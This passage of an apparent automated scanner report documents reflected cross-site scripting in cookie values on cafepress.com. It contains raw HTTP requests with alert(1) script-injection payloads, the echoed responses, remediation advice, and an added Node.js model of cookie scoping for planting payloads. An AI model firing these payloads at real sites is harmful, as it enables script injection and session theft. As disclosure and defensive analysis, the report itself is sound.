GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93d2c</script><script>alert(1)</script>063b6447c14 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63777 Date: Sun, 26 Dec 2010 13:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63777 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '93d2c</script><script>alert(1)</script>063b6447c14 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61088"-alert(1)-"7f0a7ca94f0 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before it is written into the double-quoted literal assigned to s.eVar30; the "-alert(1)-" payload then stays inside the string instead of closing it and leaving an expression between two literals.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59694 Date: Sun, 26 Dec 2010 13:49:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59694 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53143</script><script>alert(1)</script>28c54f936c4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before writing it into the single-quoted literal; that also closes the </script> breakout shown here, because the HTML parser never sees a literal "<". HTML entity encoding is not the right encoder for this context: the HTML parser does not decode entities inside a script element.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=53143</script><script>alert(1)</script>28c54f936c4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59716 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59716 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '53143</script><script>alert(1)</script>28c54f936c4 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a79d4"-alert(1)-"d4edfd82353 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response, in the s.eVar30 assignment shown below: the embedded double quote closes the string literal and the surrounding minus signs keep the statement syntactically valid, so alert(1) is evaluated as part of the expression. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability; the cookies in the response below are scoped to domain=cafepress.com, so any host under that domain on which an attacker can cause a cookie to be set (for example through a separate injection flaw) would be enough to plant the payload. This limitation considerably mitigates the impact of the vulnerability. Note also that none of the Set-Cookie headers in the response, ASP.NET_SessionId included, carry the HttpOnly flag, so script executing in this context could read the session cookie.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must reach page script, serialise it as a JSON string literal and additionally escape <, >, & and the U+2028/U+2029 line terminators as \uXXXX sequences, so that the value can neither close the string nor terminate the enclosing script element; alternatively, place it in an HTML-encoded data attribute and read it from script. Marking the cookies HttpOnly would not stop the reflection itself (the server still reads them), but it would keep the session cookie out of reach of any injected script.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59421 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
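The issue detail above notes that a cookie-based reflection is only exploitable if the attacker can plant the cookie in the victim's browser. The following is an added example, not code from this report or from cafepress.com: a minimal Node.js model of the RFC 6265 scoping rules that decide which hosts a stored cookie is sent to. Only the domain=cafepress.com scoping is taken from the Set-Cookie headers above; the hosts shop.cafepress.com and attacker.example are hypothetical, and the public-suffix check that real browsers also apply is not modelled.

```javascript
// Added example, not code from the XSS.CX report or from cafepress.com.
// A minimal model of RFC 6265 cookie scoping (domain-match, Domain attribute,
// host-only cookies) to make concrete the report's caveat that the cookie
// reflections are only exploitable if the payload can be planted in the
// victim's cookie jar. The responses in the report set cookies with
// "domain=cafepress.com"; the other host names below are hypothetical.

// RFC 6265 section 5.1.3: `host` domain-matches `domain` when they are equal,
// or when `host` ends with `domain`, the preceding character is a dot, and
// `host` is not an IP address.
function domainMatches(host, domain) {
  host = host.toLowerCase();
  domain = domain.toLowerCase();
  if (host === domain) return true;
  if (!host.endsWith(domain)) return false;
  if (host[host.length - domain.length - 1] !== '.') return false;
  return !/^\d{1,3}(\.\d{1,3}){3}$/.test(host);
}

// RFC 6265 section 5.3: a Set-Cookie with a Domain attribute yields a domain
// cookie (sent to that domain and all of its subdomains) only if the setting
// host domain-matches the attribute; otherwise the cookie is ignored. Without
// a Domain attribute the cookie is host-only. Real browsers additionally
// reject Domain values that are public suffixes such as "com" (not modelled).
function storeCookie(jar, setByHost, setCookieHeader) {
  const [pair, ...attrs] = setCookieHeader.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const name = pair.slice(0, eq), value = pair.slice(eq + 1);
  const domAttr = attrs.find(a => /^domain=/i.test(a));
  let cookie;
  if (domAttr) {
    const domain = domAttr.slice(7).replace(/^\./, '').toLowerCase();
    if (!domainMatches(setByHost, domain)) return false;   // rejected by the browser
    cookie = { name, value, domain, hostOnly: false };
  } else {
    cookie = { name, value, domain: setByHost.toLowerCase(), hostOnly: true };
  }
  // A cookie with the same name, domain and host-only flag replaces the old one
  // (the Path attribute is ignored in this model).
  const idx = jar.findIndex(c => c.name === cookie.name &&
                                 c.domain === cookie.domain &&
                                 c.hostOnly === cookie.hostOnly);
  if (idx >= 0) jar[idx] = cookie; else jar.push(cookie);
  return true;
}

// RFC 6265 section 5.4: the stored cookies attached to a request for `host`.
function cookiesFor(jar, host) {
  host = host.toLowerCase();
  return jar.filter(c => c.hostOnly ? c.domain === host : domainMatches(host, c.domain));
}

// Walk-through: which attempts to plant a cp_st-style payload reach www.cafepress.com?
function planted() {
  const jar = [];
  const payload = 'x</script><script>alert(1)</script>y';   // constructed payload
  const results = {
    // a hypothetical sibling host scoping the cookie to the parent domain
    sibling_domain: storeCookie(jar, 'shop.cafepress.com',
                                `cp_st=${payload}; domain=cafepress.com; path=/`),
    // the same host without a Domain attribute: host-only, never sent to www
    sibling_hostonly: storeCookie(jar, 'shop.cafepress.com', `cp_sc=${payload}; path=/`),
    // an unrelated origin cannot set a cafepress.com cookie at all
    foreign: storeCookie(jar, 'attacker.example', `cp-v=${payload}; domain=cafepress.com`),
  };
  results.sentToWww = cookiesFor(jar, 'www.cafepress.com').map(c => c.name);
  return results;
}

console.log(planted());
```

Only the cookie scoped with domain=cafepress.com from a host inside that domain reaches www.cafepress.com; the host-only cookie and the foreign origin's attempt do not. That is exactly why the scanner rates these findings as informational: the reflection is real, but the delivery step needs a foothold somewhere under the cookie domain.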
1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64dd9</script><script>alert(1)</script>4516792b671 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response, in the window.cafepress.tealeaf.searchTerm assignment shown below. The payload does not need to close the quoted string: the HTML parser ends a script element at the first </script> sequence regardless of JavaScript string state, so the <script>alert(1)</script> that follows is parsed as a new script element. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability; as the response below sets its cookies with domain=cafepress.com, any host under that domain on which an attacker can cause a cookie to be set would be enough to plant the payload. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=64dd9</script><script>alert(1)</script>4516792b671 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
